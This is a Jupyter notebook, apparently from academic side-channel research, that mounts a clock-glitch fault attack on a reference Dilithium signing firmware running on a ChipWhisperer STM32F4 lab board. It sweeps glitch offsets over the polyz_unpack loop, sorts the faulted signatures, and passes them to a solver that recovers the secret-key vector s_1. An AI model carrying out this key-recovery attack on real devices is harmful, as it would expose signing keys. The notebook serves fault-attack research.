# Dilithium - Glitches - Signature - Only - Attack

In [1]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CW308_STM32F4'
SS_VER = 'SS_VER_2_1'

fw_path = "../../../hardware/victims/firmware/simpleserial-dilithium-ref/simpleserial-dilithium-ref-{}.hex".format(PLATFORM)

TIMEOUT_SIGNATURE_MS = 640
TIMEOUT_SIGNATURE_NS = TIMEOUT_SIGNATURE_MS * 1e6

In [2]:
import logging
logging.basicConfig(level=logging.NOTSET)
logging.getLogger('io.github.alex1s.python-dilithium').setLevel(logging.WARNING)
logging.getLogger('gurobipy.gurobipy').setLevel(logging.WARNING) # please be quiet gurobi
logging.getLogger().setLevel(logging.DEBUG + 1) # default logger should not be used anyways!
__LOGGER = logging.getLogger(__name__)
__LOGGER.setLevel(logging.DEBUG)
logging.getLogger("usb_ctrl").setLevel(logging.WARNING)

In [3]:
import sys
if '../../../software' not in sys.path:
    sys.path.append('../../../software')
if 'python-dilithium' not in sys.path:
    sys.path.append('python-dilithium')
if 'dilithium_solver' not in sys.path:
    sys.path.append('dilithium_solver')

In [4]:
import chipwhisperer as cw
import importlib
import json
import uuid
import datetime
import threading
import numpy as np
import ipywidgets as widgets
from chipwhisperer.capture.targets import TargetIOError, TargetTimeoutError
from dilithium import Dilithium
import struct
import random
from collections import defaultdict
import time
import math
from operator import itemgetter
import functools
import pickle
import timeit
import enum

In [5]:
%%bash
make -C ../../../hardware/victims/firmware/simpleserial-dilithium-ref

make: Entering directory '/home/alexis/chipwhisperer.dilithium/hardware/victims/firmware/simpleserial-dilithium-ref'
SS_VER set to SS_VER_2_1
SS_VER set to SS_VER_2_1
make[1]: '.dep' is up to date.
SS_VER set to SS_VER_2_1
.
Welcome to another exciting ChipWhisperer target build!!
arm-none-eabi-gcc (15:9-2019-q4-0ubuntu1) 9.2.1 20191025 (release) [ARM/arm-9-branch revision 277599]
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

.
Compiling:
-en     simpleserial-dilithium-ref.c ...
mkdir -p "objdir-CW308_STM32F4"
-e Done!
.
Compiling:
-en     .././simpleserial/simpleserial.c ...
mkdir -p "objdir-CW308_STM32F4"
-e Done!
.
Compiling:
-en     .././hal/stm32f4/stm32f4_hal.c ...
mkdir -p "objdir-CW308_STM32F4"


In file included from .././hal/stm32f4/stm32f4_hal.c:3:
.././hal/stm32f4/stm32f4_hal_lowlevel.h:108: warning: "STM32F415xx" redefined
  108 | #define STM32F415xx
      | 
<command-line>: note: this is the location of the previous definition


-e Done!
.
Compiling:
-en     .././hal/stm32f4/stm32f4_hal_lowlevel.c ...
mkdir -p "objdir-CW308_STM32F4"


In file included from .././hal/stm32f4/stm32f4_hal_lowlevel.c:39:
.././hal/stm32f4/stm32f4_hal_lowlevel.h:108: warning: "STM32F415xx" redefined
  108 | #define STM32F415xx
      | 
<command-line>: note: this is the location of the previous definition


-e Done!
.
Compiling:
-en     .././hal/stm32f4/stm32f4_sysmem.c ...
mkdir -p "objdir-CW308_STM32F4"
-e Done!
.
Compiling:
-en     .././hal/stm32f4/stm32f4xx_hal_rng.c ...
mkdir -p "objdir-CW308_STM32F4"
-e Done!
.
Assembling: .././hal/stm32f4/stm32f4_startup.S
arm-none-eabi-gcc -c -mcpu=cortex-m4 -I. -x assembler-with-cpp -mthumb -mfloat-abi=soft -fmessage-length=0 -ffunction-sections -DF_CPU=7372800 -Wa,-gstabs,-adhlns=objdir-CW308_STM32F4/stm32f4_startup.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f4 -I.././hal/stm32f4/CMSIS -I.././hal/stm32f4/CMSIS/core -I.././hal/stm32f4/CMSIS/device -I.././hal/stm32f4/Legacy -I.././crypto/ .././hal/stm32f4/stm32f4_startup.S -o objdir-CW308_STM32F4/stm32f4_startup.o
.
LINKING:
-en     simpleserial-dilithium-ref-CW308_STM32F4.elf ...
-e Done!
.
Creating load file for Flash: simpleserial-dilithium-ref-CW308_STM32F4.hex
arm-none-eabi-objcopy -O ihex -R .eeprom -R .fuse -R .lock -R .signature simpleserial-dilithium-ref-CW308_STM32F4.elf simples

In [6]:
try:
    if not scope.connectStatus:
        scope.con()
except NameError:
    scope = cw.scope()

target = cw.target(scope, cw.targets.SimpleSerial2Dilithium)
target.scope = scope
target.con()

time.sleep(0.05)
target.dglitch_settings()  # dilithium glitch settings

d = target.dilithium

print("INFO: Found ChipWhisperer😍")

INFO: Found ChipWhisperer😍


In [7]:
# uncomment the following line to program the firmware; this takes a little while ...
# cw.program_target(scope, cw.programmers.STM32FProgrammer, fw_path)

In [8]:
# time for reboot_flush (also checks if chip functional ...)
target.reboot_flush()
timeit.timeit(target.reboot_flush, number=10) / 10

0.3130722276866436

In [9]:
TEST_MSG = b'\x01'  # use b'\x00' if no shuffling is enabled

In [10]:
# also check if signing is done properly ...
target.reboot_flush()
start = time.time()
target.sign(TEST_MSG)
print(time.time() - start)
sig_target = target.get_sig()
assert sig_target == d.signature(TEST_MSG, target.secret_key)

0.6378161907196045


In [11]:
# also check if signing is done properly ...
target.reboot_flush()
start = time.time()
target.sign(b'\x04')
print(time.time() - start)
sig_target = target.get_sig()
assert sig_target == d.signature(b'\x04', target.secret_key)

1.2120954990386963


In [12]:
#osc connected
scope.io.hs2 = "clkgen"  # disable glitch
print(scope.adc.trig_count)
scope.sc.arm(False)  # reset trig_count
print(scope.adc.trig_count)
scope.arm()
print(scope.adc.trig_count)
target.sign(b'\x00')

scope.io.hs2 = "glitch"  # enable glitch

print(scope.adc.trig_count)

25237341
25237341
0
127232


In [13]:
#osc disconnected
scope.io.hs2 = "clkgen"  # disable glitch
print(scope.adc.trig_count)
scope.sc.arm(False)  # reset trig_count
print(scope.adc.trig_count)
scope.arm()
print(scope.adc.trig_count)
target.sign(b'\x00')

scope.io.hs2 = "glitch"  # enable glitch

print(scope.adc.trig_count)

127232
127232
0
127232


In [14]:
# check if loop duration is as expected ... ([15904, 31808, 63616, 79520])
target.reboot_flush()
assert target.loop_duration_sign == 3976, f'instead it is: {target.loop_duration_sign}'
target.loop_duration_sign

15904


3976

In [15]:
class Rating(enum.Enum):
    GOOD = 'good'
    NEUTRAL = 'neutral'
    BAD = 'bad'

class GroupStr(str):
    def __new__(cls, value: str, rating: Rating):
        new = super().__new__(cls, value)
        new.rating = rating
        return new

In [16]:
straight_line = {'slope': 62,
  'y_intercept': 55,
  'num_points': 28,
  'l': 'B',
  'total_good': 186,
  'total_bad': 781,
  'success_rate': 0.1923474663908997
}

# magic_numbers = (55, 117, 179, 241, 302, 365, 427, 488, 551, 613, 673, 736, 798, 857, 919, 983, 1045, 1109, 1170, 1233, 1295, 1353, 1419, 1481, 1543, 1605, 1663, 1728, 1791, 1853, 1915, 1977, 2039, 2101, 2163, 2225, 2287, 2349, 2411, 2473, 2535, 2597, 2659, 2721, 2783, 2845, 2907, 2969, 3031, 3093, 3155, 3217, 3279, 3341, 3403, 3465, 3527, 3589, 3651, 3713, 3775, 3837, 3899)
magic_numbers = [straight_line['y_intercept'] + poly_index * straight_line['slope'] for poly_index in range(d._polyz_unpack_num_iters - 1)]
ext_offsets = [0] + magic_numbers
offsets = (0.390625,)
widths = (1.562500,)
# offsets = (12.5,)
# widths = (25,)
repeats = (1,)
messages = tuple(range(10000000)) # == inf
redos = (1,)  # one try per message

min_num_zeros = 2 * d.n

RES_FNAME = f'gc.results.pickled.signature-attacks-{datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")}.pickle'
RES_FNAME

'gc.results.pickled.signature-attacks-2023-04-14_17-46-40.pickle'

In [17]:
# uncomment following block if you want to search from the middle to the outside

#a =  ext_offsets[:len(ext_offsets) // 2][::-1]
#b =  ext_offsets[len(ext_offsets) // 2:]
#res = [None] * len(ext_offsets)
#res[1::2] = a
#res[::2] = b
#ext_offsets = res

ext_offsets

[0,
 55,
 117,
 179,
 241,
 303,
 365,
 427,
 489,
 551,
 613,
 675,
 737,
 799,
 861,
 923,
 985,
 1047,
 1109,
 1171,
 1233,
 1295,
 1357,
 1419,
 1481,
 1543,
 1605,
 1667,
 1729,
 1791,
 1853,
 1915,
 1977,
 2039,
 2101,
 2163,
 2225,
 2287,
 2349,
 2411,
 2473,
 2535,
 2597,
 2659,
 2721,
 2783,
 2845,
 2907,
 2969,
 3031,
 3093,
 3155,
 3217,
 3279,
 3341,
 3403,
 3465,
 3527,
 3589,
 3651,
 3713,
 3775,
 3837,
 3899]

In [18]:
offsets

(0.390625,)

In [19]:
widths

(1.5625,)

In [20]:
repeats

(1,)

In [21]:
messages

(0,
 1,
 2,
 3,
 4,
 5,
 6,
 7,
 8,
 9,
 10,
 11,
 12,
 13,
 14,
 15,
 16,
 17,
 18,
 19,
 20,
 21,
 22,
 23,
 24,
 25,
 26,
 27,
 28,
 29,
 30,
 31,
 32,
 33,
 34,
 35,
 36,
 37,
 38,
 39,
 40,
 41,
 42,
 43,
 44,
 45,
 46,
 47,
 48,
 49,
 50,
 51,
 52,
 53,
 54,
 55,
 56,
 57,
 58,
 59,
 60,
 61,
 62,
 63,
 64,
 65,
 66,
 67,
 68,
 69,
 70,
 71,
 72,
 73,
 74,
 75,
 76,
 77,
 78,
 79,
 80,
 81,
 82,
 83,
 84,
 85,
 86,
 87,
 88,
 89,
 90,
 91,
 92,
 93,
 94,
 95,
 96,
 97,
 98,
 99,
 100,
 101,
 102,
 103,
 104,
 105,
 106,
 107,
 108,
 109,
 110,
 111,
 112,
 113,
 114,
 115,
 116,
 117,
 118,
 119,
 120,
 121,
 122,
 123,
 124,
 125,
 126,
 127,
 128,
 129,
 130,
 131,
 132,
 133,
 134,
 135,
 136,
 137,
 138,
 139,
 140,
 141,
 142,
 143,
 144,
 145,
 146,
 147,
 148,
 149,
 150,
 151,
 152,
 153,
 154,
 155,
 156,
 157,
 158,
 159,
 160,
 161,
 162,
 163,
 164,
 165,
 166,
 167,
 168,
 169,
 170,
 171,
 172,
 173,
 174,
 175,
 176,
 177,
 178,
 179,
 180,
 181,
 182,
 183,
 184,


In [22]:
redos

(1,)

In [23]:
min_num_zeros

512

In [24]:
import dilithium
d = dilithium.Dilithium(2)

In [25]:
GROUPS_ZEROS = tuple(GroupStr(f"{poly_index} zeros", Rating.GOOD) for poly_index in range(d._polyz_unpack_num_iters - 1))
GROUPS_OTHER = tuple(GroupStr(f"{poly_index} other", Rating.NEUTRAL) for poly_index in range(d._polyz_unpack_num_iters - 1))
GROUPS_TIMEOUT_COUNT = tuple(GroupStr(f"{poly_index} to count", Rating.BAD) for poly_index in range(d._polyz_unpack_num_iters - 1))
GROUPS_TIMEOUT_TIME = tuple(GroupStr(f"{poly_index} to time", Rating.BAD) for poly_index in range(d._polyz_unpack_num_iters - 1))
GROUPS_EXCEPTION_SIGN = tuple(GroupStr(f"{poly_index} exc sign", Rating.BAD) for poly_index in range(d._polyz_unpack_num_iters - 1))
GROUPS_EXCEPTION_GET_SIG = tuple(GroupStr(f"{poly_index} exc get_sig", Rating.BAD) for poly_index in range(d._polyz_unpack_num_iters - 1))
GROUP_CONSTANT = GroupStr("constant", Rating.BAD)

GROUPS = tuple()
for i in range(d._polyz_unpack_num_iters - 1):
    GROUPS += (
        GROUPS_ZEROS[i],
        GROUPS_OTHER[i],
        GROUPS_TIMEOUT_COUNT[i],
        GROUPS_TIMEOUT_TIME[i],
        GROUPS_EXCEPTION_SIGN[i],
        GROUPS_EXCEPTION_GET_SIG[i]
    )
GROUPS += (GROUP_CONSTANT,)
PARAMETERS = ('ext_offset', 'offset', 'width', 'repeat', 'message', 'redo')

In [26]:
import chipwhisperer.common.results.glitch as glitch
gc = glitch.GlitchController(groups=[str(g) for g in GROUPS], parameters=PARAMETERS)
gc.set_range("ext_offset", min(ext_offsets), max(ext_offsets))
gc.set_range("offset", min(offsets), max(offsets))
gc.set_range("width", min(widths), max(widths))
gc.set_range("repeat", min(repeats), max(repeats))
gc.set_range("message", min(messages), max(messages))
gc.set_range("redo", min(redos), max(redos))
gc.display_stats()

IntText(value=0, description='0 zeros count:', disabled=True)

IntText(value=0, description='0 other count:', disabled=True)

IntText(value=0, description='0 to count count:', disabled=True)

IntText(value=0, description='0 to time count:', disabled=True)

IntText(value=0, description='0 exc sign count:', disabled=True)

...

FloatSlider(value=0.390625, continuous_update=False, description='offset setting:', disabled=True, max=0.39062…

FloatSlider(value=1.5625, continuous_update=False, description='width setting:', disabled=True, max=1.5625, mi…

FloatSlider(value=1.0, continuous_update=False, description='repeat setting:', disabled=True, max=1.0, min=1.0…

FloatSlider(value=0.0, continuous_update=False, description='message setting:', disabled=True, max=9999999.0, …

FloatSlider(value=1.0, continuous_update=False, description='redo setting:', disabled=True, max=1.0, min=1.0, …

In [27]:
zero_widgets = []
for poly_index in range(d._polyz_unpack_num_iters - 1):
    zero_widgets.append([])
    for i in range(d.l):
        zero_widgets[poly_index].append(widgets.IntSlider(
            value=0,
            min=0,
            max=min_num_zeros * 5,
            step=1,
            description=f'{poly_index} {i}',
            disabled=True,
            continuous_update=False,
            orientation='horizontal',
            readout=True,
            readout_format='d'
        ))
display(*[widget for widgets in zero_widgets for widget in widgets])

IntSlider(value=0, continuous_update=False, description='0 0', disabled=True, max=2560)

IntSlider(value=0, continuous_update=False, description='0 1', disabled=True, max=2560)

IntSlider(value=0, continuous_update=False, description='0 2', disabled=True, max=2560)

IntSlider(value=0, continuous_update=False, description='0 3', disabled=True, max=2560)

IntSlider(value=0, continuous_update=False, description='1 0', disabled=True, max=2560)

...

IntSlider(value=0, continuous_update=False, description='61 3', disabled=True, max=2560)

IntSlider(value=0, continuous_update=False, description='62 0', disabled=True, max=2560)

IntSlider(value=0, continuous_update=False, description='62 1', disabled=True, max=2560)

IntSlider(value=0, continuous_update=False, description='62 2', disabled=True, max=2560)

IntSlider(value=0, continuous_update=False, description='62 3', disabled=True, max=2560)

In [28]:
def message_to_bytes(message: int) -> bytes:
    return struct.pack(">I", message)
def trig_count_threshold() -> int:
    return target.loop_duration_sign_threshold + (d.l - 1) * target.loop_duration_sign
trig_count_threshold()

15874

In [29]:
gc_lock = threading.Lock()
def gc_add(group, parameters, strdesc=None, metadata=None) -> None:
    if group != GROUP_CONSTANT:
        if metadata is None:
            metadata = {}

        message_int = parameters[gc.parameters.index("message")]
        message_bytes = message_to_bytes(message_int)

        metadata = {
            **metadata,
            "global_counter": gc_add.global_counter,
            "message_int": message_int,
            "message_bytes": message_bytes,
            "trig_count": scope.adc.trig_count,
            "timestamp": time.time()
        }
        gc_add.global_counter += 1
    
    with gc_lock:
        try:
            gc.add(str(group), parameters, metadata=metadata)
        except TypeError:  # will be raised if we do not "gc.display_stats"; but not a problem: still collects all data
            pass
gc_add.global_counter = 0

In [30]:
gc_add(GROUP_CONSTANT, tuple([-1 for _ in gc.parameters]), metadata={
    'secret_key': target.secret_key,
    'trig_count_threshold': trig_count_threshold(),
    'group_to_rating': {str(g): g.rating.value for g in GROUPS},
    'start_times': {},
    'magic_numbers': magic_numbers,
    'min_num_zeros': min_num_zeros
})

In [31]:
def one_try(param_tuple, poly_index: int) -> None:
    """
    Try one fault parameter set.

    :param param_tuple: the parameters of the glitch (ext_offset, offset, width)
    :param action: what action is going to be glitched (polyz_unpack or signature)
    :param get_result_packed: callable 
    :returns: an upper bound on new zero coefficients
    """
    start = time.perf_counter_ns()
    target.reboot_flush()
    reset_duration_ns = time.perf_counter_ns() - start
    metadata = {'reset_duration_ns': reset_duration_ns}
    
    message = param_tuple[gc.parameters.index("message")]
    message_bytes = message_to_bytes(message)
    
    start_count = scope.adc.trig_count
    start_time = time.perf_counter_ns()
    
    """l - 1 normal iterations and one with threshold"""
    count_threshold = trig_count_threshold()
    
    # these TWO commands combined sets scope.adc.trig_count to zero
    scope.sc.arm(False)
    scope.arm()
    assert scope.adc.trig_count == 0
    
    target.sign_send(message_bytes)
    while target.in_waiting() == 0:  # no response from target
        if time.perf_counter_ns() - start_time > TIMEOUT_SIGNATURE_NS:
            gc_add(GROUPS_TIMEOUT_TIME[poly_index], param_tuple)
            return
        if scope.adc.trig_count > count_threshold:
            gc_add(GROUPS_TIMEOUT_COUNT[poly_index], param_tuple)
            return
        
    try:
        target.sign_recv(timeout=100)  # should be quick as target already started sending
    except TargetIOError:  # corrupted or no response from the target; we could but do not really care to differentiate
        gc_add(GROUPS_EXCEPTION_SIGN[poly_index], param_tuple)
        return
    
    try:
        signature_packed = target.get_sig()
    except TargetIOError:  # corrupted or no response from the target; we could but do not really care to differentiate
        gc_add(GROUPS_EXCEPTION_GET_SIG[poly_index], param_tuple)
        return
    
    # okay, now we are done with the target ...
    metadata['packed'] = signature_packed
    
    _, z, _ = d._unpack_sig(signature_packed)
    num_zeros = np.count_nonzero(np.abs(z) <= d.beta)  # TODO change to d._polyz_unpack_coeffs_per_iter // 2 or something like that ...
    if num_zeros > d._polyz_unpack_num_iters:
        gc_add(GROUPS_ZEROS[poly_index], param_tuple, metadata=metadata)
    else:
        gc_add(GROUPS_OTHER[poly_index], param_tuple, metadata=metadata)
        
    return np.count_nonzero(np.abs(z) <= d.beta, axis=1)
    

In [32]:
def save_results():
    with open(RES_FNAME, 'wb') as f:
        pickle.dump(gc.results, f)

In [33]:
save_thread_event = threading.Event()
def save_thread() -> None:
    while True:
        if save_thread_event.is_set():
            break
        with gc_lock:
            save_results()
        time.sleep(2 * 60)  # two minutes
        
thread = threading.Thread(target=save_thread)

In [34]:
def other_loops(poly_index: int, ext_offset: int):
    zeros = np.zeros(d.l)
    
    for offset in offsets:
        scope.glitch.offset = offset
        if gc.widget_list_parameter is not None:
            gc.widget_list_parameter[gc.parameters.index("offset")].value = offset
        for width in widths:
            scope.glitch.width = width
            if gc.widget_list_parameter is not None:
                gc.widget_list_parameter[gc.parameters.index("width")].value = width
            for repeat in repeats:
                scope.glitch.repeat = repeat
                if gc.widget_list_parameter is not None:
                    gc.widget_list_parameter[gc.parameters.index("repeat")].value = repeat
                for message in messages:
                    if gc.widget_list_parameter is not None:
                        gc.widget_list_parameter[gc.parameters.index("message")].value = message
                    for redo in redos:
                        if gc.widget_list_parameter is not None:
                            gc.widget_list_parameter[gc.parameters.index("redo")].value = redo

                        param_tuple = ext_offset, offset, width, repeat, message, redo
                        new_zeros = one_try(param_tuple, poly_index)

                        if new_zeros is not None:
                            zeros += new_zeros

                        if new_zeros is not None and np.any(new_zeros > 0):
                            for i in range(d.l):
                                zero_widgets[poly_index][i].value = zeros[i]

                        if np.all(zeros >= min_num_zeros):
                            return

In [35]:
thread.start()
logging.getLogger("ChipWhisperer Target").setLevel(logging.WARNING + 1)  # disable WARNING messages like "Read timed out: " or "Read timed out: Wÿ+"

start_time = time.time()
for poly_index, ext_offset in enumerate(ext_offsets):
    scope.glitch.ext_offset = ext_offset
    if gc.widget_list_parameter is not None:
        gc.widget_list_parameter[gc.parameters.index("ext_offset")].value = ext_offset
    gc.results.result_dict['constant'][0]['metadata']['start_times'][poly_index] = time.time()
    other_loops(poly_index, ext_offset)



end_time = time.time()
total_duration = end_time - start_time
print(f'total duration: {total_duration}s {total_duration/60}min {total_duration/3600}h')

print("Setting event for save thread.")
save_thread_event.set()
print("Joining with save thread.")
thread.join()

KeyboardInterrupt: 

In [ ]:
save_results()

In [ ]:
exithere

In [ ]:
sigs_faulted_unpacked = list(map(lambda sig_packed: d._unpack_sig_full(sig_packed), sigs_faulted))
from dilithium_solver.signature import Signature, calculate_c_matrix_np
from dilithium_solver.recover_s_1_entry import recover_s_1_entry
from dilithium_solver.parameters import Parameters

params = Parameters.get_nist_security_level(d.nist_security_level)

sigs = list(map(
    lambda sig_faulted: Signature(
        sig_faulted[1],
        sig_faulted[0],
        calculate_c_matrix_np(sig_faulted[0], params)
    ), sigs_faulted_unpacked))
s_1_entry_index = 0


s_1 = d._unpack_sk(sk)[4]
timeout = 10
threshold = d.beta
for i in range(len(sigs_faulted_unpacked[0][1])): # long version of saying "l"
    result = recover_s_1_entry(sigs, i, s_1, params, 142387, timeout, threshold) # this number is not relevant
    print(result)

In [ ]:
scope.dis()
target.dis()